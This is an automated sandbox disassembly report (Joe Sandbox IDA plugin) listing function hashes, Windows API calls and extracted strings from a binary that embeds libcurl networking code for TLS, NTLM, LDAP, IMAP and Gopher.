    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CriticalErrorLastSection$CheckLeaveStackVars@8$EnterFailuregetaddrinfosend
    • String ID:
    • API String ID: 3366018236-0
    • Opcode ID: 720431268a666bce7020e844d86fc9f57535349fa9942334f814da3d58c2bb89
    • Instruction ID: 6f59f0ab64f43444708a10ceed6d4eb7faf22ac3f4eaa22a8044a9ce9f683afa
    • Opcode Fuzzy Hash: 720431268a666bce7020e844d86fc9f57535349fa9942334f814da3d58c2bb89
    • Instruction Fuzzy Hash: D051B171E00204AFCB54EF98D895BDDBBB7AF49310F514168E849AB351CB34AE85CBD1
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065D491
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckFailureStackVars@8
    • String ID: $%s://%s$file$file
    • API String ID: 1096530042-3994756935
    • Opcode ID: 63ec236e639ea485d746f7c138794ebe76adf1f4144a2947387fe96a429413c2
    • Instruction ID: 4cd8704ce5c3c01e7e5a63f12154abf4e8b73d74d7cd3375dd3b4ec6b0a716e5
    • Opcode Fuzzy Hash: 63ec236e639ea485d746f7c138794ebe76adf1f4144a2947387fe96a429413c2
    • Instruction Fuzzy Hash: 6C124CB5A00208EFEB24DF94C855BEE77B2AF44305F148179ED096B382D735AA85CF91
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AF894
    Strings
    • InitializeSecurityContext failed: %s, xrefs: 006AF7B9
    • CompleteAuthToken failed: %s, xrefs: 006AF853
    • Negotiate, xrefs: 006AF50C
    • SPNEGO handshake failure (empty challenge message), xrefs: 006AF5BB
    • Negotiate, xrefs: 006AF3DB
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: CompleteAuthToken failed: %s$InitializeSecurityContext failed: %s$Negotiate$Negotiate$SPNEGO handshake failure (empty challenge message)
    • API String ID: 930174750-3887576622
    • Opcode ID: b3b32482c085789d7c7ea1286a19effc71d1234e8b65b55378e7718a80bc54f6
    • Instruction ID: 092649e206625810f089217db5d647e18a1c9a6c0b8549a213c002602e00b32b
    • Opcode Fuzzy Hash: b3b32482c085789d7c7ea1286a19effc71d1234e8b65b55378e7718a80bc54f6
    • Instruction Fuzzy Hash: AE027171A00208DFDB54EF54C891BEAB7B6FB49304F158268E809AB391D779ED85CF81
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0068F2B8
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068F5A5
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: LDAP$Z
    • API String ID: 88142382-1365892505
    • Opcode ID: ee16ef244778e4a6f44e3ebb23d59b3a820c1bd739bfbd7be165aabf23973cb4
    • Instruction ID: a3ac39d31c5e20067bdfa145f9dda4a7bfe7a225b82d78bb18e1f55f46667a45
    • Opcode Fuzzy Hash: ee16ef244778e4a6f44e3ebb23d59b3a820c1bd739bfbd7be165aabf23973cb4
    • Instruction Fuzzy Hash: B7F16EB0A00219DFDB14EF98C895BEEB7B2BF45305F108269E915AB341C774AE81CF95
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006789FC
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678A1F
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678A86
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678AD6
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678B46
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678B96
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678DDB
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
    • String ID:
    • API String ID: 885266447-0
    • Opcode ID: c28920a4aa92e4efecad622ef2cd55c7614e3421dde6e6a1239b55235133a922
    • Instruction ID: 7fa8203a1f7c09dd260f0e0c66cf9a4b3b158f2d09e78e1f3c3c09f4a9fc57db
    • Opcode Fuzzy Hash: c28920a4aa92e4efecad622ef2cd55c7614e3421dde6e6a1239b55235133a922
    • Instruction Fuzzy Hash: 9D02D8B4A00209DFDB58DF98C594AEEB7B2FF48304F248269E809AB355DB31AD41CF55
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069097D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
    • API String ID: 930174750-2060961330
    • Opcode ID: 75ba9a46521e62f025f6f1032a2c7115988e3a1642ae1b5bd58c19fda4b31cc1
    • Instruction ID: a4f7ff5f62e3f11a872dfba967e783714265bd5b84ff54032511149b9ca4ab70
    • Opcode Fuzzy Hash: 75ba9a46521e62f025f6f1032a2c7115988e3a1642ae1b5bd58c19fda4b31cc1
    • Instruction Fuzzy Hash: C0E14970E04209DFEF14DBA8D994BFEB7BAAF44304F248159E415BB741C735AA80CBA5
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B4610
    Strings
    • Excessive server response line length received, %zd bytes. Stripping, xrefs: 006B452C
    • cached response data too big to handle, xrefs: 006B427D
    • (, xrefs: 006B4541
    • response reading failed, xrefs: 006B435E
    • 8, xrefs: 006B4357
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: ($8$Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed
    • API String ID: 930174750-38606329
    • Opcode ID: 68b6df6ecd83edfb5532655f61f628ce230aeb4b78244614b33c3ea51652b656
    • Instruction ID: b7caf416aef3ef7e89f3ecac605af5edda4d7791fe0ba8ff27986a87ef31842a
    • Opcode Fuzzy Hash: 68b6df6ecd83edfb5532655f61f628ce230aeb4b78244614b33c3ea51652b656
    • Instruction Fuzzy Hash: 89F1D8B5A00109DFDB14CF98D495AEEB7B2FF48314F188259E819AB342DB35E981CB91
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006BB035
    Strings
    Similarity
    • API ID: CheckStackVars@8
    • String ID: GSSAPI handshake failure (empty challenge message)$Kerberos$Kerberos$Mk
    • API String ID: 930174750-115818366
    • Opcode ID: 50c252f844abea23593d6b820cddb2e97c7da14f99f228d6df6acf14a9c7a5dd
    • Instruction ID: 6aeb1b1fc1de057cf623d85dc47e94c5f34812425cdc7bfb50df1efff9021c33
    • Opcode Fuzzy Hash: 50c252f844abea23593d6b820cddb2e97c7da14f99f228d6df6acf14a9c7a5dd
    • Instruction Fuzzy Hash: 94E16DB1A00218DFDB14DF98D885BEE77F6AF48304F118298E909AB381D7759E85CF91
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067F3D2
    Strings
    • Q, xrefs: 0067F33C
    • select/poll on SSL socket, errno: %d, xrefs: 0067F2B4
    • schannel: timed out sending data (bytes sent: %zd), xrefs: 0067F2E8
    • schannel: timed out sending data (bytes sent: %zd), xrefs: 0067F251
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Q$schannel: timed out sending data (bytes sent: %zd)$schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
    • API String ID: 930174750-1115633909
    • Opcode ID: ad102b8328f02b477e0d977b3a7b7d357037559d7feb868a070ec2343a0f0ea3
    • Instruction ID: 35cfeca575a28dbadd79f58e8a2c382dab3db512962f649f2e82cfc6ff88cc51
    • Opcode Fuzzy Hash: ad102b8328f02b477e0d977b3a7b7d357037559d7feb868a070ec2343a0f0ea3
    • Instruction Fuzzy Hash: 72D174B5900209DFDB14DF98D881FAEB7B6FF48314F248268E819AB391D735AD41CB91
    APIs
    Strings
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %ld$.%ld$e$g
    • API String ID: 1951014933-2266449361
    • Opcode ID: 84326f6b2042cdee29f6b68bea7ffcdced396b6998f2c3f3151b0bcd79230bfb
    • Instruction ID: 0165a7dfa8e521cc46e54a6a1633d5b7bed912b9ec7e77c68c237fea68a4e8a5
    • Opcode Fuzzy Hash: 84326f6b2042cdee29f6b68bea7ffcdced396b6998f2c3f3151b0bcd79230bfb
    • Instruction Fuzzy Hash: FAE1D77090026B8BCB75CB18C891BBDB772AF45304F1481E9D41D6BB95DB309E82EF95
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A52B4
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Strings
    Similarity
    • API ID: CheckFailureStackVars@8
    • String ID: %sAuthorization: NTLM %s$%sAuthorization: NTLM %s$\Mp$dMp$lMp
    • API String ID: 1096530042-4037171492
    • Opcode ID: 59797231091b93321633e8dda17738f1ae07df8be7f5cac6b2e0e6639df3d2f6
    • Instruction ID: aa64bc2914154b1b90e39a5a86781a64fa3fe937e4d67ca0883b5139b93d4c0e
    • Opcode Fuzzy Hash: 59797231091b93321633e8dda17738f1ae07df8be7f5cac6b2e0e6639df3d2f6
    • Instruction Fuzzy Hash: EAC13B74A00608DFDB14DF98D884BEDBBB2AF89304F148169E906AB351D735AE41CF95
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0065EF58
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065F058
    Strings
    • No valid port number in connect to host string (%s), xrefs: 0065EFC1
    • Invalid IPv6 address format, xrefs: 0065EF3B
    • %25, xrefs: 0065EE8D
    • Please URL encode %% as %%25, see RFC 6874., xrefs: 0065EE9E
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
    • API String ID: 88142382-2404041592
    • Opcode ID: c485378d8432f4ba1cbd1bdc483bf2e2ea8ebeeaaded747cee2e980166d91a87
    • Instruction ID: 2d52e93ad7549a26846bc2656c9519274bcf33690ba4646d8eb180807cfed2bf
    • Opcode Fuzzy Hash: c485378d8432f4ba1cbd1bdc483bf2e2ea8ebeeaaded747cee2e980166d91a87
    • Instruction Fuzzy Hash: 8491C3B0E002599BDF18DF94C891AFEBBB3AF46316F144169ED01AB341D735AA84CB91
    Strings
    • SSL/TLS connection timeout, xrefs: 006826DB
    • SSL/TLS connection timeout, xrefs: 006825E3
    • SSL/TLS connection timeout, xrefs: 00682564
    • select/poll on SSL/TLS socket, errno: %d, xrefs: 006826A1
    • g, xrefs: 006827A3
    Similarity
    • API ID:
    • String ID: SSL/TLS connection timeout$SSL/TLS connection timeout$SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d$g
    • API String ID: 0-2274353235
    • Opcode ID: 463575d0970aed58d13f10ae87389d2554ea36343b4cb1f67c900ce7a0b42ff1
    • Instruction ID: 70247d849191bd8bf4f809dede9bf14c816b33d3aa1154006bdd6027fc8fce45
    • Opcode Fuzzy Hash: 463575d0970aed58d13f10ae87389d2554ea36343b4cb1f67c900ce7a0b42ff1
    • Instruction Fuzzy Hash: 8FA14D74E0020AEFCB14EFA4C5A5AEEB7B2BB49314F64C258E8156B341D735DE81CB91
    APIs
    • _strlen.LIBCMT ref: 0068F6E8
    • _strlen.LIBCMT ref: 0068F700
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 00662740: @_RTC_CheckStackVars@8.LIBCMT ref: 0066280E
      • Part of subcall function 006621C0: _strlen.LIBCMT ref: 006621E6
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068F8A9
    Strings
    Similarity
    • API ID: _strlen$CheckStackVars@8$Failure
    • String ID: %s?%s$7$Failed sending Gopher request
    • API String ID: 4167602484-2776782726
    • Opcode ID: 8b81d02725d0c8d4a23ab26d9a2f60facc5186976e87cc6467aa951552f17901
    • Instruction ID: 2cb6c4cd24e7964347a58b4da56827c9b21f338c1c7463f28bf28d62589f0f12
    • Opcode Fuzzy Hash: 8b81d02725d0c8d4a23ab26d9a2f60facc5186976e87cc6467aa951552f17901
    • Instruction Fuzzy Hash: B3819EB5E00218EFDB14EF98DC85BEEB7B6BF48304F144229E505A7381D735AA41CBA5
    APIs
    • std::locale::_Init.LIBCPMT ref: 00636158
      • Part of subcall function 006BDC09: std::_Lockit::_Lockit.LIBCPMT ref: 006BDC1B
      • Part of subcall function 006BDC09: std::locale::_Setgloballocale.LIBCPMT ref: 006BDC36
      • Part of subcall function 006BDC09: _Yarn.LIBCPMT ref: 006BDC4C
      • Part of subcall function 006BDC09: std::_Lockit::~_Lockit.LIBCPMT ref: 006BDC8C
    • std::_Lockit::_Lockit.LIBCPMT ref: 0063616F
    • std::_Lockit::_Lockit.LIBCPMT ref: 00636191
    • std::_Lockit::~_Lockit.LIBCPMT ref: 006361B1
    • std::_Facet_Register.LIBCPMT ref: 00636216
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00636232
    • __CxxThrowException@8.LIBVCRUNTIME ref: 006363C3
      • Part of subcall function 006C3ACD: RaiseException.KERNEL32(?,?,006BD8D2,?,?,?,?,?,?,?,?,006BD8D2,?,006FA3D8,00000000,?), ref: 006C3B2D
      • Part of subcall function 006C8CF4: _free.LIBCMT ref: 006C8D07
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$ExceptionException@8Facet_InitRaiseRegisterSetgloballocaleThrowYarn_free
    • String ID:
    • API String ID: 1940542955-0
    • Opcode ID: 6dc02e8535af0db9ff30278793586632973c6131d98df786c293a93de3acf87f
    • Instruction ID: a8a8af7da415e525108212292b3899a4a9a696e19c06e97ea8532c7db0d8bd29
    • Opcode Fuzzy Hash: 6dc02e8535af0db9ff30278793586632973c6131d98df786c293a93de3acf87f
    • Instruction Fuzzy Hash: A7915CB0900219DFDB14DFA4D884B9EBBB6BF04314F14825DE805AB382EB75AA45CB95
    APIs
    • GetLastError.KERNEL32(?,00000000,?,00664304,?,00664304,?), ref: 006A63EA
    • _strncpy.LIBCMT ref: 006A66B1
    • GetLastError.KERNEL32 ref: 006A66DB
    • SetLastError.KERNEL32(?), ref: 006A66F3
    Strings
    Similarity
    • API ID: ErrorLast$_strncpy
    • String ID: a$x_p
    • API String ID: 3397631897-2061801670
    • Opcode ID: 9a5c58c74213528bba9abb478e6b1e5fdb2fdff22e9f0f87da877e711761d714
    • Instruction ID: f3d975de98b06b29df9dc52aead291fb4ff7c0aea5d27cecf9994633a3cb2c0b
    • Opcode Fuzzy Hash: 9a5c58c74213528bba9abb478e6b1e5fdb2fdff22e9f0f87da877e711761d714
    • Instruction Fuzzy Hash: CA81C4F0C14719DBDF04EF95C6482AEB7F2AB5230CB18D2AAA5156A240CBBC1E459F53
    APIs
    • _strlen.LIBCMT ref: 006A48C1
    • _strlen.LIBCMT ref: 006A48FB
      • Part of subcall function 006AF330: @_RTC_CheckStackVars@8.LIBCMT ref: 006AF894
    Strings
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: (Lp$0Lp$Negotiate$Negotiate auth restarted
    • API String ID: 3286693010-3820949398
    • Opcode ID: f0954c1ee337dc4a1014b2c8bbd7aeeaecdf265d373f48db89e78ab0934d633d
    • Instruction ID: 239d7ca73f2bd30ab3596c8c3c11050eb0bc3b354c09d401b7c80756766081a1
    • Opcode Fuzzy Hash: f0954c1ee337dc4a1014b2c8bbd7aeeaecdf265d373f48db89e78ab0934d633d
    • Instruction Fuzzy Hash: 6E7117B4E01249DBDB04DF98D880BEEBBB2BF89304F148169E905AB341D775AE41CF95
    APIs
    • VerSetConditionMask.KERNEL32(00000002,00666495,00000002,00000004,?,?), ref: 0066674B
    • VerSetConditionMask.KERNEL32(00000002,00666495,00000001,00000004,?,?), ref: 00666772
    • VerSetConditionMask.KERNEL32(00000002,00666495,00000020,00000005,?,?), ref: 00666799
    • VerSetConditionMask.KERNEL32(00000002,00666495,00000010,00000005,?,?), ref: 006667C0
    • VerSetConditionMask.KERNEL32(00000000,00666495,00000008,00000001,?,?), ref: 006667E7
    • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000,00666495), ref: 0066680D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066682F
    Similarity
    • API ID: ConditionMask$CheckInfoStackVars@8VerifyVersion
    • String ID:
    • API String ID: 525484876-0
    • Opcode ID: 91b54f3a9b88a5fa8170005394014d4cfd93be440492cbb6e4d806b3681b8ced
    • Instruction ID: 32940fef7d06775b1b46bcf7615af65779cc97cac09608f4b97dbb1f89f9ff57
    • Opcode Fuzzy Hash: 91b54f3a9b88a5fa8170005394014d4cfd93be440492cbb6e4d806b3681b8ced
    • Instruction Fuzzy Hash: 37718071D083A8DEDB50DB68DC45BEEBBBAAB46304F0441DDE44867281C7B55E84CFA2
    APIs
    • CertFreeCertificateContext.CRYPT32(00000000), ref: 0067F607
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067F621
    Strings
    • Z, xrefs: 0067F499
    • SSL: public key does not match pinned public key!, xrefs: 0067F5E2
    • schannel: Failed to read remote certificate context: %s, xrefs: 0067F4F8
    • SSL: failed retrieving public key from server certificate, xrefs: 0067F59B
    Similarity
    • API ID: CertCertificateCheckContextFreeStackVars@8
    • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key!$Z$schannel: Failed to read remote certificate context: %s
    • API String ID: 833836643-3483829282
    • Opcode ID: a4e9a94445a6755b2ca81217a165e0dd11998f5dd1a3ca85aa06e4fd96f1f3ad
    • Instruction ID: 61b1bbdecfc064cb4bfe05ea5a716a1a10a9942dc4c2f1b3fb339837aba9b7cd
    • Opcode Fuzzy Hash: a4e9a94445a6755b2ca81217a165e0dd11998f5dd1a3ca85aa06e4fd96f1f3ad
    • Instruction Fuzzy Hash: 3C514BB5A00109DFDB14DF98D981FEEB3F6AB49304F1081A8E909A7351D735AE85CFA1
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006923EC
    Strings
    Similarity
    • API ID: CheckStackVars@8
    • String ID: *$C$Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY %19[0123456789]]$Select failed
    • API String ID: 930174750-4022285532
    • Opcode ID: 6ea789f842a624eb9dca582ee882b566ad369e5236b18be2f40184e49a5a981f
    • Instruction ID: 44aeb29d668c78992d98028a21407d6c571a920268bb0b1d890be1ae14ea688a
    • Opcode Fuzzy Hash: 6ea789f842a624eb9dca582ee882b566ad369e5236b18be2f40184e49a5a981f
    • Instruction Fuzzy Hash: DC51A1B5D00109EFCF04DF98D895AAEB7BABF48304F108569E8066B351DB35EE41CBA5
    APIs
    • setsockopt.WS2_32(00664D9D,0000FFFF,00000008,00664D9D,00000004), ref: 00664A48
    • WSAIoctl.WS2_32(00664D9D,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00664AE1
    • WSAGetLastError.WS2_32 ref: 00664AF4
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00664B21
    Strings
    • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 00664B06
    • Failed to set SO_KEEPALIVE on fd %d, xrefs: 00664A5D
    Similarity
    • API ID: CheckStackVars@8_strlen$ErrorFailureIoctlLastsetsockopt
    • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
    • API String ID: 2973344180-277924715
    • Opcode ID: e04b38b9c7c1ed0d59ee031419a8aa86ab4acd5c758935b78bb7ab0d0e8fbf5e
    • Instruction ID: 4b8e1d939c0584448f784acd8bf5f95cf55d80fb3716783257651ca14f5bc639
    • Opcode Fuzzy Hash: e04b38b9c7c1ed0d59ee031419a8aa86ab4acd5c758935b78bb7ab0d0e8fbf5e
    • Instruction Fuzzy Hash: 3841A6B5E00208BFDB04DF99D842FED77BAEF49300F108129F919AB291DA759A00CB95
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 00640CF4
    • std::_Lockit::_Lockit.LIBCPMT ref: 00640D14
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00640D34
    • std::_Facet_Register.LIBCPMT ref: 00640DF8
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00640E10
    Strings
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
    • String ID: ?qo
    • API String ID: 459529453-996102081
    • Opcode ID: b15e87c1d3c64136345985039f9401f476263b18c16ea56b715a6f456b6c157d
    • Instruction ID: c5beb9650d7fa60bf2f7956cbb7aabf22f99eb0d0ecf7cdd6ce457dc272798e7
    • Opcode Fuzzy Hash: b15e87c1d3c64136345985039f9401f476263b18c16ea56b715a6f456b6c157d
    • Instruction Fuzzy Hash: 6341AC71A04224DFEB24DF94C840BEABBBAEF00714F24815DE9059B381EB75BA45CBC5
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 00640BAD
    • std::_Lockit::_Lockit.LIBCPMT ref: 00640BCD
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00640BED
    • std::_Facet_Register.LIBCPMT ref: 00640C8B
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00640CA3
    Strings
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
    • String ID: ?qo
    • API String ID: 459529453-996102081
    • Opcode ID: efa5b0da5c403beecd9b00fffb8bbfefa9a1b85f65ec9542287055fd2b079999
    • Instruction ID: 47ffe720515cac65dad83aff1b651899bca3c62f50a780bbf27bc914cf607e69
    • Opcode Fuzzy Hash: efa5b0da5c403beecd9b00fffb8bbfefa9a1b85f65ec9542287055fd2b079999
    • Instruction Fuzzy Hash: 9A41E671900224DFDB20DF54C880BEABBBAEF10714F24825DE9469B341EB75AD41CBC5
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 0063F20D
    • std::_Lockit::_Lockit.LIBCPMT ref: 0063F22D
    • std::_Lockit::~_Lockit.LIBCPMT ref: 0063F24D
    • std::_Facet_Register.LIBCPMT ref: 0063F2EB
    • std::_Lockit::~_Lockit.LIBCPMT ref: 0063F303
    Strings
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
    • String ID: ?qo
    • API String ID: 459529453-996102081
    • Opcode ID: 0c65f8dcaa99aba3a542cb330638defd47557a9be4a18ed365f02287d318b683
    • Instruction ID: 988c72c25f7757f8b56f5075188bdc76bad6a93dca8c36dfde17c2a95d547d7f
    • Opcode Fuzzy Hash: 0c65f8dcaa99aba3a542cb330638defd47557a9be4a18ed365f02287d318b683
    • Instruction Fuzzy Hash: 8541BD71900215DFCB14DF94C881BEABBBAEF10714F15826DE8069B392EB71AE41CBC5
    APIs
    • #33.WLDAP32(?,?,?), ref: 0068E5F2
    • #301.WLDAP32(00000000,00000000), ref: 0068E62F
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • _strlen.LIBCMT ref: 0068E652
    • #35.WLDAP32(00000000,00000000,00000000), ref: 0068E66E
    • #79.WLDAP32(00000000), ref: 0068E6DD
    • #200.WLDAP32(00000000), ref: 0068E701
    • #301.WLDAP32(00000000,00000000), ref: 0068E71F
    • #301.WLDAP32(00000000,00000000), ref: 0068EBAF
    • #41.WLDAP32(00000000), ref: 0068EBD0
    • #46.WLDAP32(00000000), ref: 0068EC1D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068EC69
    Strings
    • There are more than %d entries, xrefs: 0068EBEE
    Similarity
    • API ID: #301$#200CheckFailureStackVars@8_strlen
    • String ID: There are more than %d entries
    • API String ID: 3172481382-741417676
    • Opcode ID: dd2862d014df6d6330ea848dda20b0c6fa3b4aacdaf5ea9cbd502ca56dfb04ae
    • Instruction ID: 89e1beed7d044e6ea6a286a706d26a544e5c0a6162af9331043d3184f1100188
    • Opcode Fuzzy Hash: dd2862d014df6d6330ea848dda20b0c6fa3b4aacdaf5ea9cbd502ca56dfb04ae
    • Instruction Fuzzy Hash: 8631C5B1D00214ABCF24FBA8DD46BDD7376AF45314F244329E829772D1DA355E84CB92
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0067781C
    • ___from_strstr_to_strchr.LIBCMT ref: 0067784D
    • ___from_strstr_to_strchr.LIBCMT ref: 0067786B
    Strings
    • The requested URL returned error: %d, xrefs: 006778A8
    • The requested URL returned error: %s, xrefs: 00677886
    • HTTP, xrefs: 006777FD
    Similarity
    • API ID: ___from_strstr_to_strchr
    • String ID: HTTP$The requested URL returned error: %d$The requested URL returned error: %s
    • API String ID: 601868998-4174864708
    APIs
